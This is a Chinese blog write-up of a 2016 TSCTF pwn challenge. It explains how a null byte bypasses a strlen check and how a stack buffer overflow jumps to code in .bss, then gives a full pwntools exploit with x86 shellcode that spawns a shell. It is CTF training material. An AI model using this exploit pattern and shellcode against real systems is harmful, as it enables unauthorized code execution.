2016 TSCTF 个人赛

最新推荐文章于 2024-03-15 10:00:50 发布
最新推荐文章于 2024-03-15 10:00:50 发布
阅读量672 收藏
点赞数
分类专栏: Pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/think_ycx/article/details/68961478
版权

pwn1

thoughts

int sub_804857D()
{
  int v1; // [sp+10h] [bp-20h]@1

  setbuf(stdin, 0);
  setbuf(stdout, 0);
  setbuf(stderr, 0);
  printf("=====Welcome to tsctf2016!=====\n\nPlease input your name:");
  read(0, &unk_804A065, 0x10u);
  printf("What do you what to say:");
  read(0, &v1, 0x80u);
  if ( strlen((const char *)&v1) > 0x1F )
  {
    puts("you dian CHOU!!!");
    exit(0);
  }
  puts("You are beautiful!");
  return 0;
}
  1. 第一个read处,unk_804A065位于bss段,可以在此处布置asm,利用第二个read处的bof来跳转到此处。
  2. 在第二个read处,利用\x00来绕过strlen的长度判断。此处,\x00后布置shellcode、覆盖ebp、返回地址。

bof处payload两种写法:
- payload = ‘\x00’ + shellcode +’\x90’*18 +p32(0xdeadbeaf) +p32(bss_addr)
- payload = ‘\x00’ +’\x90’*39 +p32(0xdeadbeaf) + p32(bss_addr) + shellcode

总结

  1. 看到漏洞,思考此处可以干嘛。如:16个字节的bss段可读可写地址确定。
  2. IDA中buf的位置是[bp-0x20],但是gdb调试时,buf的位置是ebp-0x28,不知道为啥,感觉IDA有时候反编译的不准确。

exp

from pwn import *

debug = 1
local = 1
attach = local & 0
bps = attach & 1
proc_name = 'pwn1'
#socat TCP4-LISTEN:10001,fork EXEC:./pwn1
ip = '127.0.0.1'
port = 10001
io = None

def makeio():
    global io 
    if local:
        io = process(proc_name)
    else:
        io = remote(ip,port)
def ru(data):
    return io.recvuntil(data)
def rv():
    return io.recv()
def sl(data):
    return io.sendline(data)
def sn(data):
    return io.send(data)
def rl():
    return io.recvline()


def pwn1():
    ru("name:")
    # call ebp-0x2f
    jmpebp = asm('mov ebp,esp;sub ebp,0x2F;call ebp')
    payload = jmpebp.ljust(16,chr(0x90));sn(payload)   # sl will send \n
    #payload = 16*'\x90';sn(payload)   # sl will send \n

    ru("say:")
    payload = '\x00' + shellcode +'\x90'*18  +p32(0xdeadbeaf) +p32(bss_addr);sn(payload)
    print len(payload)
    io.interactive()


def pwn2():
    ru("name:")
    jmpebp = asm('jmp esp')
    payload = jmpebp.ljust(16,chr(0x90));sn(payload)   # sl will send \n
    #payload = 16*'\x90';sn(payload)   # sl will send \n
    ru("say:")
    payload = '\x00'  +'\x90'*39  +p32(0xdeadbeaf) + p32(bss_addr) + shellcode;sn(payload)
    print len(payload)
    io.interactive()

def pwn():
    makeio()
    if debug:
        context.log_level = 'debug'
    if attach:
        if bps:
            gdb.attach(pidof(proc_name)[0], open('bps'))
        else:
            gdb.attach(pidof(proc_name)[0])
    bss_addr = 0x0804A065
    shellcode = "\x31\xc9\xf7\xe1\x51\x68\x2f\x2f\x73"
    shellcode += "\x68\x68\x2f\x62\x69\x6e\x89\xe3\xb0"
    shellcode += "\x0b\xcd\x80"
    pwn2()


if __name__ == '__main__':
    pwn()
think_ycx
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PolarCTF2024冬季个人挑战赛wp含web、misc、crypto_polar冬季赛
2401_83621784的博客
04-15 853
是php.ini中的一个配置选项,它可将用户访问文件的活动范围限制在指定的区域,假设open_basedir=/home/wwwroot/home/web1/:/tmp/,那么通过web1访问服务器的用户就无法获取服务器上除了/home/wwwroot/home/web1/和/tmp/这两个目录以外的文件。(补题发现,秋季那道ezupload,上传GIF文件,再抓包改php后缀,蚁剑,不过我连接的时候,警告返回数据为空?上传文件之后,可以F12查看网络,就可以看到文件上传的位置了,再用蚁剑连接即可。
2016 TSCTF 初赛
think_ycx的专栏
04-03 773
pwn1thoughts在第一个子函数布置shellcode(bss段的地址可定位)。puts("I'm zhouheiya, what about you?"); read(0, &format, 0x32u); printf(&format);此处存在bof,计算偏移覆盖返回地址为bss段中shellcode地址即可。puts("I'm datouerzi, what about you?");
TSCTF-J EasyF12
Lig_HossssT的博客
10-24 200
点击F12( 进入game1 发现移动并没有什么卵用 点击F12( 把disabled消掉 点击按钮进入game2 (或者直接进game2.php 点一次训练按钮会消失很久 所以 点击F12 fina1.php一片空白 点击F12 发现是md5碰撞 强弱碰撞都有 掏出fastcoll 得到flag ...
TSCTF-J 2021 [SimplePHP]
Ivyyyyyy1的博客
10-24 229
一、题目 进来看到的代码如下: <?php highlight_file(__FILE__); if ($_GET["secret"] != hash("md4", $_GET["secret"])) { die('乐<br>'); } if (!preg_match('/http/i', $_GET['file'])) { if (preg_match('/^i_am_bloodhound$/', $_GET['name']) && $..
TSCTF-J 2019】relax
qtL0ng的博客
07-01 352
打开是个没用的网站,扫描一下~ 访问/robots.txt,发现三个文件: User-agent: * Disallow: /relax.php Disallow: /heicore.php Disallow: /flag.php 其中只有/relax.php里有东西,查看源码: 这个是aaencode代码,直接扔进控制台运行,或者在线解密:https://www.qtool.net/decode 整理得: $_ = $_GET['pw']; $__ = $_GET['file']; $___ =
第二届TSCTF比赛writeup及心得-Web
weixin_34335458的博客
05-11 196
1. 送分题 一开始真没明白为什么叫送分题,后来明白了,泪流满面。。我只想说,查看源码这个事情一辈子都不能忘。 还是推荐以后都用这个,就不会漏了 2.Do you know time 网页显示一张福利图片,下载下来,随便用二进制打开图片,翻到最后面,发现了代码,种子确定了,srand就没意义了,种子是由time()函数确定的,发到服务器上总要一点时间,所以我们用time()+...
2022西电抗疫CTF个人赛
k0414的博客
01-07 3308
2022西电抗疫CTF个人赛 详细写了下crypto的wp,其余方向简略给出思路或脚本 文章目录2022西电抗疫CTF个人赛CRYPTO1.做个核酸签个到2.Random?Secure?Algorithm?3.fight_against_covid4.AweSomeSha3!5.BOB的健康码5.1 BOB的健康码15.2 BOB的健康码25.3 BOB的健康码3MISC1-6WEB1-6PWN1-34.Collision5.scripts6.formatstringREVERSE1.the edge2.b
TSCTF-J 2019 bypass
西部壮仔的博客
04-01 745
题目: <?php highlight_file(__FILE__); if(md5($_GET['pass']) == md5($_GET['username']) && $_GET['pass'] != $_GET['username']){ if(strpos($_GET['username'],"tsctf") === 0){ ...
2023Polar CTF冬季个人挑战赛部分wp
ZJPC007的博客
12-10 369
第一次参加polarctf的比赛,做的不好,把做出来的题目wp传上来和大家分享做题方法,哪里有错还请大佬指教。题目还能复现的,在平台上就能做。
第二届TSCTFwriteup及心得-MISC
weixin_34014277的博客
05-12 152
1. Welcome_to_TSCTF 给了密码,访问文章输入密码得到: 差不多了,不往下做了 2.zip包伪加密 就是呢,压缩包让输入密码,打开包发现是个伪加密,这个要查zip的包结构,里面是明文的,但是目录结束后面的加密标识位是09,改成00就好,然后打开看见logo图片,把它放到stegslove里面分析Frame,得到 或者用binwalk直接分析它,这个我不会 3.我的节操碎一地 拼...
粉丝答疑:CTF可以一个人参加比赛吗?
最新发布
Libra1313的博客
03-15 1139
WEB(web类):WEB应用在今天越来越广泛,也是CTF夺旗竞赛中的主要题型,题目涉及到常见的Web漏洞,诸如注入、XSS、文件包含、代码审计、上传等漏洞。话虽如此,现在 CTF 大赛都已经往实战的方向走了,高水准的 CTF 题目很多都会模拟真实的网站,让你更加有真实渗透的代入感,渗透手法也更加贴近实战。内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…
CTF —网络安全大赛
weixin_68789096的博客
02-27 6031
💻随着大数据、人工智能的发展,人们步入了新的时代,逐渐走上科技的巅峰。⚔科技是一把双刃剑,网络安全不容忽视,人们的隐私在大数据面前暴露无遗,账户被盗、资金损失、网络诈骗、隐私泄露,种种迹象表明,随着互联网的发展,网络安全需要引起人们的重视。💂互联网安全从其本质上来讲就是互联网上的信息安全。从广义来说,凡是涉及到互联网上信息的保密性、完整性、可用性、真实性和可控性的相关技术和理论都是网络安全的研究领域。👨‍👨‍👧‍👦网络安全需要一群网络安全技术人员的维护。而CTF,就是这些人技术竞技的比赛。
CTF安全竞赛介绍
PICACHU+++的博客
07-01 7759
Web是CTF中最主要的题型,也是大多数人入门CTF的第一类题目,这类题目涉及常见的Web漏洞,例如:SQL注入,XSS,CSRF,文件上传、包含、下载,代码执行,反序列化等等。也有一些关于网络基础知识的考察:TCP/IP协议,数据包内容和构造等等MISC是CTF中综合性最强的一类题目,也是难度略大的一类,主要涉及隐写,流量审查,取证分析,社会工程学,数据分析与统计等包括古典密码学和现代密码学,古典密码学种类多,趣味性较强;现代密码学对数学,算法,编程能力要求高。
CTF比赛工具自收集
我的学习笔记
02-28 1万+
点滴积累,以免以后需要了又找不到了。综合{1、CTF工具免费集:https://www.ctftools.com/down/2、聊天机器人助手:https://github.com/CylanceSPEAR/CyBot}密码学{1、培根密码在线解密:https://netair.xyz/tools/%E5%9F%B9%E6%A0%B9%E5%AF%86%...
stderr和stdout详细解说
热门推荐
数据之美的博客
04-07 2万+
cstdio> object stderr FILE * stderr; Standard error stream The standard error stream is the defaultdestination for error messages and other diagnostic warnings. Like stdout, itis usuall
DDCTF部分WP
dydxdz的博客
04-22 6001
这周去打了DDCTF,花了一周做出了九道题,完成了1000分的梦想。也算是菜鸡打比赛这么久拿到分数最多的一次了,现记录如下: MISC 1、(╯°□°)╯︵ ┻━┻ (╯°□°)╯︵ ┻━┻ d4e8e1f4a0f7e1f3a0e6e1f3f4a1a0d4e8e5a0e6ece1e7a0e9f3baa0c4c4c3d4c6fbb9e1b2e2e5e2b5b4e4b8b7e...
HITCTF 2018 wp [我真是菜鸟]
Assassin
02-02 5718
WEB PHPreading 源码泄露,存在index.php.bak,,解一下base64知道 $flag=$_GET['asdfgjxzkallgj8852'];if($flag=='H1TctF2018EzCTF'){die($flag);}die('emmmm'); 输入得到flag BabyEval 看一下泄露了一部分源码 <!-- $str=@(str
setbuf使用细节
sanpam的博客
11-02 1789
#include &lt;stdio.h&gt; int main() { int c; char buf[BUFSIZ]; setbuf(stdout, buf); while((c=getchar())!='b') { putchar(c); fflush( stdout ); } return 0; } setbuf...
setbuf函数详解
涛行无疆的专栏
10-28 2万+
程序输出有两种方式:一种是即时处理方式,另一种是先暂存起来,然后再大块写入的方式,前者往往造成较高的系统负担。因此,c语言实现通常都允许程序员进行实际的写操作之前控制产生的输出数据量。 这种控制能力一般是通过库函数setbuf实现的。如果buf是一个大小适当的字符数组,那么: setbuf(stdout,buf); 语句将通知输入/输出库,所有写入到stdout的输出都应该使用buf作为输出
hitcon_2014_stkof详解
像初雪一样自由洒落
04-20 1593
本文主要列出hitcon2014_stkof的详细过程 主要参考:unlink 系列 程序流程 allocate:分配一个指定size大小的块,返回idx。 其中块的指针信息保存在一个全局变量0x602140中 fill:根据idx找到对应的块,重新给定大小size,读入内容content free:释放idx的块 漏洞分析 由于fill时候的size可以重新制定,可以造成堆溢出。 没有打印函数 有一个全局变量 方法:unlink unlink,控制全局变量内容 修改chunk1指.

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值